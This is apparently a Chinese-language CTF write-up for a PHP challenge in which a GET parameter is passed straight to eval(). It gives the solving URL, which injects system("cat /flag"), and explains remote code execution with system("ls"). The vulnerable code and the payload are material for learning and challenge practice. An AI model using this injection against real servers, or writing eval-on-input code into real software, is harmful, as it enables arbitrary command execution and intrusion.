源码

<?php
if(isset($_GET[2024])){
eval($_GET[2024]);
} else {
echo "服务器剩余防御:1层";
}
?>

思路

存在危险函数 eval() ,可以执行系统命令,使用下面的参数即可

http://ctf.seek2.top:32805/?2024=system(%22cat%20/flag%22);

知识点

eval() 是一个PHP内置函数,它可以执行传递给它的字符串参数作为代码

这个函数在 CTF 竞赛中常常被用来构造题目,因为它的使用可能会导致严重的安全问题。如果没有正确地处理用户输入,攻击者可以通过 eval() 执行任意代码,当传入GET参数cmd=system(“ls”);

当PHP代码执行 eval($_GET[‘cmd’]) 时,会输出当前目录下所有文件,相当于在服务器终端上执行 ls 命令